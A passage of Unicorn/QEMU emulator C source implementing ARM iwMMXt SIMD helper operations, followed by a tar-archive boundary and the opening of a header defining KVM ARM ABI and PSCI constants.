EXTEND8(a) ((uint32_t) (int8_t) (a)) #define EXTEND16(a) ((uint32_t) (int16_t) (a)) #define EXTEND16S(a) ((int32_t) (int16_t) (a)) #define EXTEND32(a) ((uint64_t) (int32_t) (a)) uint64_t HELPER(iwmmxt_maddsq)(uint64_t a, uint64_t b) { a = (( EXTEND16S((a >> 0) & 0xffff) * EXTEND16S((b >> 0) & 0xffff) + EXTEND16S((a >> 16) & 0xffff) * EXTEND16S((b >> 16) & 0xffff) ) & 0xffffffff) | ((uint64_t) ( EXTEND16S((a >> 32) & 0xffff) * EXTEND16S((b >> 32) & 0xffff) + EXTEND16S((a >> 48) & 0xffff) * EXTEND16S((b >> 48) & 0xffff) ) << 32); return a; } uint64_t HELPER(iwmmxt_madduq)(uint64_t a, uint64_t b) { a = (( ((a >> 0) & 0xffff) * ((b >> 0) & 0xffff) + ((a >> 16) & 0xffff) * ((b >> 16) & 0xffff) ) & 0xffffffff) | (( ((a >> 32) & 0xffff) * ((b >> 32) & 0xffff) + ((a >> 48) & 0xffff) * ((b >> 48) & 0xffff) ) << 32); return a; } uint64_t HELPER(iwmmxt_sadb)(uint64_t a, uint64_t b) { #define abs(x) (((x) >= 0) ? x : -x) #define SADB(SHR) abs((int) ((a >> SHR) & 0xff) - (int) ((b >> SHR) & 0xff)) return SADB(0) + SADB(8) + SADB(16) + SADB(24) + SADB(32) + SADB(40) + SADB(48) + SADB(56); #undef SADB } uint64_t HELPER(iwmmxt_sadw)(uint64_t a, uint64_t b) { #define SADW(SHR) \ abs((int) ((a >> SHR) & 0xffff) - (int) ((b >> SHR) & 0xffff)) return SADW(0) + SADW(16) + SADW(32) + SADW(48); #undef SADW } uint64_t HELPER(iwmmxt_mulslw)(uint64_t a, uint64_t b) { #define MULS(SHR) ((uint64_t) ((( \ EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ ) >> 0) & 0xffff) << SHR) return MULS(0) | MULS(16) | MULS(32) | MULS(48); #undef MULS } uint64_t HELPER(iwmmxt_mulshw)(uint64_t a, uint64_t b) { #define MULS(SHR) ((uint64_t) ((( \ EXTEND16S((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff) \ ) >> 16) & 0xffff) << SHR) return MULS(0) | MULS(16) | MULS(32) | MULS(48); #undef MULS } uint64_t HELPER(iwmmxt_mululw)(uint64_t a, uint64_t b) { #define MULU(SHR) ((uint64_t) ((( \ ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ ) >> 0) & 0xffff) << SHR) return MULU(0) | MULU(16) | MULU(32) | MULU(48); #undef MULU } uint64_t HELPER(iwmmxt_muluhw)(uint64_t a, uint64_t b) { #define MULU(SHR) ((uint64_t) ((( \ ((a >> SHR) & 0xffff) * ((b >> SHR) & 0xffff) \ ) >> 16) & 0xffff) << SHR) return MULU(0) | MULU(16) | MULU(32) | MULU(48); #undef MULU } uint64_t HELPER(iwmmxt_macsw)(uint64_t a, uint64_t b) { #define MACS(SHR) ( \ EXTEND16((a >> SHR) & 0xffff) * EXTEND16S((b >> SHR) & 0xffff)) return (int64_t) (MACS(0) + MACS(16) + MACS(32) + MACS(48)); #undef MACS } uint64_t HELPER(iwmmxt_macuw)(uint64_t a, uint64_t b) { #define MACU(SHR) ( \ (uint32_t) ((a >> SHR) & 0xffff) * \ (uint32_t) ((b >> SHR) & 0xffff)) return MACU(0) + MACU(16) + MACU(32) + MACU(48); #undef MACU } #define NZBIT8(x, i) \ SIMD8_SET(NBIT8((x) & 0xff), SIMD_NBIT, i) | \ SIMD8_SET(ZBIT8((x) & 0xff), SIMD_ZBIT, i) #define NZBIT16(x, i) \ SIMD16_SET(NBIT16((x) & 0xffff), SIMD_NBIT, i) | \ SIMD16_SET(ZBIT16((x) & 0xffff), SIMD_ZBIT, i) #define NZBIT32(x, i) \ SIMD32_SET(NBIT32((x) & 0xffffffff), SIMD_NBIT, i) | \ SIMD32_SET(ZBIT32((x) & 0xffffffff), SIMD_ZBIT, i) #define NZBIT64(x) \ SIMD64_SET(NBIT64(x), SIMD_NBIT) | \ SIMD64_SET(ZBIT64(x), SIMD_ZBIT) #define IWMMXT_OP_UNPACK(S, SH0, SH1, SH2, SH3) \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, b)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ (((a >> SH0) & 0xff) << 0) | (((b >> SH0) & 0xff) << 8) | \ (((a >> SH1) & 0xff) << 16) | (((b >> SH1) & 0xff) << 24) | \ (((a >> SH2) & 0xff) << 32) | (((b >> SH2) & 0xff) << 40) | \ (((a >> SH3) & 0xff) << 48) | (((b >> SH3) & 0xff) << 56); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, w)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ (((a >> SH0) & 0xffff) << 0) | \ (((b >> SH0) & 0xffff) << 16) | \ (((a >> SH2) & 0xffff) << 32) | \ (((b >> SH2) & 0xffff) << 48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT8(a >> 0, 0) | NZBIT8(a >> 16, 1) | \ NZBIT8(a >> 32, 2) | NZBIT8(a >> 48, 3); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, l)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ (((a >> SH0) & 0xffffffff) << 0) | \ (((b >> SH0) & 0xffffffff) << 32); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ub)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ (((x >> SH0) & 0xff) << 0) | \ (((x >> SH1) & 0xff) << 16) | \ (((x >> SH2) & 0xff) << 32) | \ (((x >> SH3) & 0xff) << 48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, uw)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ (((x >> SH0) & 0xffff) << 0) | \ (((x >> SH2) & 0xffff) << 32); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, ul)))(CPUARMState *env, \ uint64_t x) \ { \ x = (((x >> SH0) & 0xffffffff) << 0); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sb)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ ((uint64_t) EXTEND8H((x >> SH0) & 0xff) << 0) | \ ((uint64_t) EXTEND8H((x >> SH1) & 0xff) << 16) | \ ((uint64_t) EXTEND8H((x >> SH2) & 0xff) << 32) | \ ((uint64_t) EXTEND8H((x >> SH3) & 0xff) << 48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | \ NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sw)))(CPUARMState *env, \ uint64_t x) \ { \ x = \ ((uint64_t) EXTEND16((x >> SH0) & 0xffff) << 0) | \ ((uint64_t) EXTEND16((x >> SH2) & 0xffff) << 32); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); \ return x; \ } \ uint64_t HELPER(glue(iwmmxt_unpack, glue(S, sl)))(CPUARMState *env, \ uint64_t x) \ { \ x = EXTEND32((x >> SH0) & 0xffffffff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x >> 0); \ return x; \ } IWMMXT_OP_UNPACK(l, 0, 8, 16, 24) IWMMXT_OP_UNPACK(h, 32, 40, 48, 56) #define IWMMXT_OP_CMP(SUFF, Tb, Tw, Tl, O) \ uint64_t HELPER(glue(iwmmxt_, glue(SUFF, b)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = \ CMP(0, Tb, O, 0xff) | CMP(8, Tb, O, 0xff) | \ CMP(16, Tb, O, 0xff) | CMP(24, Tb, O, 0xff) | \ CMP(32, Tb, O, 0xff) | CMP(40, Tb, O, 0xff) | \ CMP(48, Tb, O, 0xff) | CMP(56, Tb, O, 0xff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | \ NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | \ NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | \ NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_, glue(SUFF, w)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = CMP(0, Tw, O, 0xffff) | CMP(16, Tw, O, 0xffff) | \ CMP(32, Tw, O, 0xffff) | CMP(48, Tw, O, 0xffff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | \ NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); \ return a; \ } \ uint64_t HELPER(glue(iwmmxt_, glue(SUFF, l)))(CPUARMState *env, \ uint64_t a, uint64_t b) \ { \ a = CMP(0, Tl, O, 0xffffffff) | \ CMP(32, Tl, O, 0xffffffff); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); \ return a; \ } #define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ (TYPE) ((b >> SHR) & MASK)) ? (uint64_t) MASK : 0) << SHR) IWMMXT_OP_CMP(cmpeq, uint8_t, uint16_t, uint32_t, ==) IWMMXT_OP_CMP(cmpgts, int8_t, int16_t, int32_t, >) IWMMXT_OP_CMP(cmpgtu, uint8_t, uint16_t, uint32_t, >) #undef CMP #define CMP(SHR, TYPE, OPER, MASK) ((((TYPE) ((a >> SHR) & MASK) OPER \ (TYPE) ((b >> SHR) & MASK)) ? a : b) & ((uint64_t) MASK << SHR)) IWMMXT_OP_CMP(mins, int8_t, int16_t, int32_t, <) IWMMXT_OP_CMP(minu, uint8_t, uint16_t, uint32_t, <) IWMMXT_OP_CMP(maxs, int8_t, int16_t, int32_t, >) IWMMXT_OP_CMP(maxu, uint8_t, uint16_t, uint32_t, >) #undef CMP #define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) IWMMXT_OP_CMP(subn, uint8_t, uint16_t, uint32_t, -) IWMMXT_OP_CMP(addn, uint8_t, uint16_t, uint32_t, +) #undef CMP /* TODO Signed- and Unsigned-Saturation */ #define CMP(SHR, TYPE, OPER, MASK) ((uint64_t) (((TYPE) ((a >> SHR) & MASK) \ OPER (TYPE) ((b >> SHR) & MASK)) & MASK) << SHR) IWMMXT_OP_CMP(subu, uint8_t, uint16_t, uint32_t, -) IWMMXT_OP_CMP(addu, uint8_t, uint16_t, uint32_t, +) IWMMXT_OP_CMP(subs, int8_t, int16_t, int32_t, -) IWMMXT_OP_CMP(adds, int8_t, int16_t, int32_t, +) #undef CMP #undef IWMMXT_OP_CMP #define AVGB(SHR) ((( \ ((a >> SHR) & 0xff) + ((b >> SHR) & 0xff) + round) >> 1) << SHR) #define IWMMXT_OP_AVGB(r) \ uint64_t HELPER(iwmmxt_avgb##r)(CPUARMState *env, uint64_t a, uint64_t b) \ { \ const int round = r; \ a = AVGB(0) | AVGB(8) | AVGB(16) | AVGB(24) | \ AVGB(32) | AVGB(40) | AVGB(48) | AVGB(56); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ SIMD8_SET(ZBIT8((a >> 0) & 0xff), SIMD_ZBIT, 0) | \ SIMD8_SET(ZBIT8((a >> 8) & 0xff), SIMD_ZBIT, 1) | \ SIMD8_SET(ZBIT8((a >> 16) & 0xff), SIMD_ZBIT, 2) | \ SIMD8_SET(ZBIT8((a >> 24) & 0xff), SIMD_ZBIT, 3) | \ SIMD8_SET(ZBIT8((a >> 32) & 0xff), SIMD_ZBIT, 4) | \ SIMD8_SET(ZBIT8((a >> 40) & 0xff), SIMD_ZBIT, 5) | \ SIMD8_SET(ZBIT8((a >> 48) & 0xff), SIMD_ZBIT, 6) | \ SIMD8_SET(ZBIT8((a >> 56) & 0xff), SIMD_ZBIT, 7); \ return a; \ } IWMMXT_OP_AVGB(0) IWMMXT_OP_AVGB(1) #undef IWMMXT_OP_AVGB #undef AVGB #define AVGW(SHR) ((( \ ((a >> SHR) & 0xffff) + ((b >> SHR) & 0xffff) + round) >> 1) << SHR) #define IWMMXT_OP_AVGW(r) \ uint64_t HELPER(iwmmxt_avgw##r)(CPUARMState *env, uint64_t a, uint64_t b) \ { \ const int round = r; \ a = AVGW(0) | AVGW(16) | AVGW(32) | AVGW(48); \ env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = \ SIMD16_SET(ZBIT16((a >> 0) & 0xffff), SIMD_ZBIT, 0) | \ SIMD16_SET(ZBIT16((a >> 16) & 0xffff), SIMD_ZBIT, 1) | \ SIMD16_SET(ZBIT16((a >> 32) & 0xffff), SIMD_ZBIT, 2) | \ SIMD16_SET(ZBIT16((a >> 48) & 0xffff), SIMD_ZBIT, 3); \ return a; \ } IWMMXT_OP_AVGW(0) IWMMXT_OP_AVGW(1) #undef IWMMXT_OP_AVGW #undef AVGW uint64_t HELPER(iwmmxt_align)(uint64_t a, uint64_t b, uint32_t n) { a >>= n << 3; a |= b << (64 - (n << 3)); return a; } uint64_t HELPER(iwmmxt_insr)(uint64_t x, uint32_t a, uint32_t b, uint32_t n) { x &= ~((uint64_t) b << n); x |= (uint64_t) (a & b) << n; return x; } uint32_t HELPER(iwmmxt_setpsr_nz)(uint64_t x) { return SIMD64_SET((x == 0), SIMD_ZBIT) | SIMD64_SET((x & (1ULL << 63)), SIMD_NBIT); } uint64_t HELPER(iwmmxt_bcstb)(uint32_t arg) { arg &= 0xff; return ((uint64_t) arg << 0 ) | ((uint64_t) arg << 8 ) | ((uint64_t) arg << 16) | ((uint64_t) arg << 24) | ((uint64_t) arg << 32) | ((uint64_t) arg << 40) | ((uint64_t) arg << 48) | ((uint64_t) arg << 56); } uint64_t HELPER(iwmmxt_bcstw)(uint32_t arg) { arg &= 0xffff; return ((uint64_t) arg << 0 ) | ((uint64_t) arg << 16) | ((uint64_t) arg << 32) | ((uint64_t) arg << 48); } uint64_t HELPER(iwmmxt_bcstl)(uint32_t arg) { return arg | ((uint64_t) arg << 32); } uint64_t HELPER(iwmmxt_addcb)(uint64_t x) { return ((x >> 0) & 0xff) + ((x >> 8) & 0xff) + ((x >> 16) & 0xff) + ((x >> 24) & 0xff) + ((x >> 32) & 0xff) + ((x >> 40) & 0xff) + ((x >> 48) & 0xff) + ((x >> 56) & 0xff); } uint64_t HELPER(iwmmxt_addcw)(uint64_t x) { return ((x >> 0) & 0xffff) + ((x >> 16) & 0xffff) + ((x >> 32) & 0xffff) + ((x >> 48) & 0xffff); } uint64_t HELPER(iwmmxt_addcl)(uint64_t x) { return (x & 0xffffffff) + (x >> 32); } uint32_t HELPER(iwmmxt_msbb)(uint64_t x) { return ((x >> 7) & 0x01) | ((x >> 14) & 0x02) | ((x >> 21) & 0x04) | ((x >> 28) & 0x08) | ((x >> 35) & 0x10) | ((x >> 42) & 0x20) | ((x >> 49) & 0x40) | ((x >> 56) & 0x80); } uint32_t HELPER(iwmmxt_msbw)(uint64_t x) { return ((x >> 15) & 0x01) | ((x >> 30) & 0x02) | ((x >> 45) & 0x04) | ((x >> 52) & 0x08); } uint32_t HELPER(iwmmxt_msbl)(uint64_t x) { return ((x >> 31) & 0x01) | ((x >> 62) & 0x02); } /* FIXME: Split wCASF setting into a separate op to avoid env use. */ uint64_t HELPER(iwmmxt_srlw)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((x & (0xffffll << 0)) >> n) & (0xffffll << 0)) | (((x & (0xffffll << 16)) >> n) & (0xffffll << 16)) | (((x & (0xffffll << 32)) >> n) & (0xffffll << 32)) | (((x & (0xffffll << 48)) >> n) & (0xffffll << 48)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_srll)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((x & (0xffffffffll << 0)) >> n) | ((x >> n) & (0xffffffffll << 32)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_srlq)(CPUARMState *env, uint64_t x, uint32_t n) { x >>= n; env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_sllw)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((x & (0xffffll << 0)) << n) & (0xffffll << 0)) | (((x & (0xffffll << 16)) << n) & (0xffffll << 16)) | (((x & (0xffffll << 32)) << n) & (0xffffll << 32)) | (((x & (0xffffll << 48)) << n) & (0xffffll << 48)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_slll)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((x << n) & (0xffffffffll << 0)) | ((x & (0xffffffffll << 32)) << n); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_sllq)(CPUARMState *env, uint64_t x, uint32_t n) { x <<= n; env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_sraw)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((uint64_t) ((EXTEND16(x >> 0) >> n) & 0xffff) << 0) | ((uint64_t) ((EXTEND16(x >> 16) >> n) & 0xffff) << 16) | ((uint64_t) ((EXTEND16(x >> 32) >> n) & 0xffff) << 32) | ((uint64_t) ((EXTEND16(x >> 48) >> n) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_sral)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((EXTEND32(x >> 0) >> n) & 0xffffffff) << 0) | (((EXTEND32(x >> 32) >> n) & 0xffffffff) << 32); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_sraq)(CPUARMState *env, uint64_t x, uint32_t n) { x = (int64_t) x >> n; env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_rorw)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((((x & (0xffffll << 0)) >> n) | ((x & (0xffffll << 0)) << (16 - n))) & (0xffffll << 0)) | ((((x & (0xffffll << 16)) >> n) | ((x & (0xffffll << 16)) << (16 - n))) & (0xffffll << 16)) | ((((x & (0xffffll << 32)) >> n) | ((x & (0xffffll << 32)) << (16 - n))) & (0xffffll << 32)) | ((((x & (0xffffll << 48)) >> n) | ((x & (0xffffll << 48)) << (16 - n))) & (0xffffll << 48)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } uint64_t HELPER(iwmmxt_rorl)(CPUARMState *env, uint64_t x, uint32_t n) { x = ((x & (0xffffffffll << 0)) >> n) | ((x >> n) & (0xffffffffll << 32)) | ((x << (32 - n)) & (0xffffffffll << 0)) | ((x & (0xffffffffll << 32)) << (32 - n)); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(x >> 0, 0) | NZBIT32(x >> 32, 1); return x; } uint64_t HELPER(iwmmxt_rorq)(CPUARMState *env, uint64_t x, uint32_t n) { x = ror64(x, n); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT64(x); return x; } uint64_t HELPER(iwmmxt_shufh)(CPUARMState *env, uint64_t x, uint32_t n) { x = (((x >> ((n << 4) & 0x30)) & 0xffff) << 0) | (((x >> ((n << 2) & 0x30)) & 0xffff) << 16) | (((x >> ((n << 0) & 0x30)) & 0xffff) << 32) | (((x >> ((n >> 2) & 0x30)) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(x >> 0, 0) | NZBIT16(x >> 16, 1) | NZBIT16(x >> 32, 2) | NZBIT16(x >> 48, 3); return x; } /* TODO: Unsigned-Saturation */ uint64_t HELPER(iwmmxt_packuw)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); return a; } uint64_t HELPER(iwmmxt_packul)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); return a; } uint64_t HELPER(iwmmxt_packuq)(CPUARMState *env, uint64_t a, uint64_t b) { a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); return a; } /* TODO: Signed-Saturation */ uint64_t HELPER(iwmmxt_packsw)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xff) << 0) | (((a >> 16) & 0xff) << 8) | (((a >> 32) & 0xff) << 16) | (((a >> 48) & 0xff) << 24) | (((b >> 0) & 0xff) << 32) | (((b >> 16) & 0xff) << 40) | (((b >> 32) & 0xff) << 48) | (((b >> 48) & 0xff) << 56); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT8(a >> 0, 0) | NZBIT8(a >> 8, 1) | NZBIT8(a >> 16, 2) | NZBIT8(a >> 24, 3) | NZBIT8(a >> 32, 4) | NZBIT8(a >> 40, 5) | NZBIT8(a >> 48, 6) | NZBIT8(a >> 56, 7); return a; } uint64_t HELPER(iwmmxt_packsl)(CPUARMState *env, uint64_t a, uint64_t b) { a = (((a >> 0) & 0xffff) << 0) | (((a >> 32) & 0xffff) << 16) | (((b >> 0) & 0xffff) << 32) | (((b >> 32) & 0xffff) << 48); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT16(a >> 0, 0) | NZBIT16(a >> 16, 1) | NZBIT16(a >> 32, 2) | NZBIT16(a >> 48, 3); return a; } uint64_t HELPER(iwmmxt_packsq)(CPUARMState *env, uint64_t a, uint64_t b) { a = (a & 0xffffffff) | ((b & 0xffffffff) << 32); env->iwmmxt.cregs[ARM_IWMMXT_wCASF] = NZBIT32(a >> 0, 0) | NZBIT32(a >> 32, 1); return a; } uint64_t HELPER(iwmmxt_muladdsl)(uint64_t c, uint32_t a, uint32_t b) { return c + ((int32_t) EXTEND32(a) * (int32_t) EXTEND32(b)); } uint64_t HELPER(iwmmxt_muladdsw)(uint64_t c, uint32_t a, uint32_t b) { c += EXTEND32(EXTEND16S((a >> 0) & 0xffff) * EXTEND16S((b >> 0) & 0xffff)); c += EXTEND32(EXTEND16S((a >> 16) & 0xffff) * EXTEND16S((b >> 16) & 0xffff)); return c; } uint64_t HELPER(iwmmxt_muladdswl)(uint64_t c, uint32_t a, uint32_t b) { return c + (EXTEND32(EXTEND16S(a & 0xffff) * EXTEND16S(b & 0xffff))); } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/kvm-consts.h����������������������������������������������������������0000664�0000000�0000000�00000017752�14675241067�0020511�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * KVM ARM ABI constant definitions * * Copyright (c) 2013 Linaro Limited * * Provide versions of KVM constant defines that can be used even * when CONFIG_KVM is not set and we don't have access to the * KVM headers. If CONFIG_KVM is set, we do a compile-time check * that we haven't got out of sync somehow. * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef ARM_KVM_CONSTS_H #define ARM_KVM_CONSTS_H #ifdef CONFIG_KVM #include <linux/kvm.h> #include <linux/psci.h> #define MISMATCH_CHECK(X, Y) QEMU_BUILD_BUG_ON(X != Y) #else #define MISMATCH_CHECK(X, Y) QEMU_BUILD_BUG_ON(0) #endif #define CP_REG_SIZE_SHIFT 52 #define CP_REG_SIZE_MASK 0x00f0000000000000ULL #define CP_REG_SIZE_U32 0x0020000000000000ULL #define CP_REG_SIZE_U64 0x0030000000000000ULL #define CP_REG_ARM 0x4000000000000000ULL #define CP_REG_ARCH_MASK 0xff00000000000000ULL MISMATCH_CHECK(CP_REG_SIZE_SHIFT, KVM_REG_SIZE_SHIFT); MISMATCH_CHECK(CP_REG_SIZE_MASK, KVM_REG_SIZE_MASK); MISMATCH_CHECK(CP_REG_SIZE_U32, KVM_REG_SIZE_U32); MISMATCH_CHECK(CP_REG_SIZE_U64, KVM_REG_SIZE_U64); MISMATCH_CHECK(CP_REG_ARM, KVM_REG_ARM); MISMATCH_CHECK(CP_REG_ARCH_MASK, KVM_REG_ARCH_MASK); #define QEMU_PSCI_0_1_FN_BASE 0x95c1ba5e #define QEMU_PSCI_0_1_FN(n) (QEMU_PSCI_0_1_FN_BASE + (n)) #define QEMU_PSCI_0_1_FN_CPU_SUSPEND QEMU_PSCI_0_1_FN(0) #define QEMU_PSCI_0_1_FN_CPU_OFF QEMU_PSCI_0_1_FN(1) #define QEMU_PSCI_0_1_FN_CPU_ON QEMU_PSCI_0_1_FN(2) #define QEMU_PSCI_0_1_FN_MIGRATE QEMU_PSCI_0_1_FN(3) MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_SUSPEND, KVM_PSCI_FN_CPU_SUSPEND); MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_OFF, KVM_PSCI_FN_CPU_OFF); MISMATCH_CHECK(QEMU_PSCI_0_1_FN_CPU_ON, KVM_PSCI_FN_CPU_ON); MISMATCH_CHECK(QEMU_PSCI_0_1_FN_MIGRATE, KVM_PSCI_FN_MIGRATE); #define QEMU_PSCI_0_2_FN_BASE 0x84000000 #define QEMU_PSCI_0_2_FN(n) (QEMU_PSCI_0_2_FN_BASE + (n)) #define QEMU_PSCI_0_2_64BIT 0x40000000 #define QEMU_PSCI_0_2_FN64_BASE \ (QEMU_PSCI_0_2_FN_BASE + QEMU_PSCI_0_2_64BIT) #define QEMU_PSCI_0_2_FN64(n) (QEMU_PSCI_0_2_FN64_BASE + (n)) #define QEMU_PSCI_0_2_FN_PSCI_VERSION QEMU_PSCI_0_2_FN(0) #define QEMU_PSCI_0_2_FN_CPU_SUSPEND QEMU_PSCI_0_2_FN(1) #define QEMU_PSCI_0_2_FN_CPU_OFF QEMU_PSCI_0_2_FN(2) #define QEMU_PSCI_0_2_FN_CPU_ON QEMU_PSCI_0_2_FN(3) #define QEMU_PSCI_0_2_FN_AFFINITY_INFO QEMU_PSCI_0_2_FN(4) #define QEMU_PSCI_0_2_FN_MIGRATE QEMU_PSCI_0_2_FN(5) #define QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE QEMU_PSCI_0_2_FN(6) #define QEMU_PSCI_0_2_FN_MIGRATE_INFO_UP_CPU QEMU_PSCI_0_2_FN(7) #define QEMU_PSCI_0_2_FN_SYSTEM_OFF QEMU_PSCI_0_2_FN(8) #define QEMU_PSCI_0_2_FN_SYSTEM_RESET QEMU_PSCI_0_2_FN(9) #define 